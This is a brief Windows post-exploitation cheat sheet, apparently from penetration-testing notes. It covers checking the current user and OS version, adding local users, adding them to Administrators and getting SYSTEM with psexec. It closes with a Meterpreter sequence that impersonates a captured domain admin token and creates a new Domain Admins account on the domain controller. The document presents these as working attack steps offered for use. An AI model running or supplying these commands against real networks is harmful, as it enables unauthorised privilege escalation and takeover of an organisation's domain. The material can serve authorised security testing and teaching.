Check Who You Are
echo %USERDOMAIN%\%USERNAME whoami
Check Windows Version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Add a User
net user <username> <password> /add</password></username>
Add a User to the Administrators Group
net localgroup administrators <username> /add
Getting from Administrator to System
psexec -s cmd.exe
Getting system with Meterpreter
(from the meterpreter shell)
Changing a Users Password
net user <username> <password>
View Domain Groups
net group /domain
View Members of Domain Group
net group /domain <Group Name>
Add Member with Domain Admin
This attack is on the assumption you have obtained a meterpreter shell on a system and you’re lucky enough to have found a domain admin’s token.
impersonate_token <Domain>\\<Username> # The Domain Admin's Username add_user <Username> <password> -h <Host IP of Domain Controller> # An attacker defined Username add_group_user "Domain Admins" <Username> -h <Host IP of Domain Controller>
You should now have an account on the Domain Controller with Domain Admin privileges.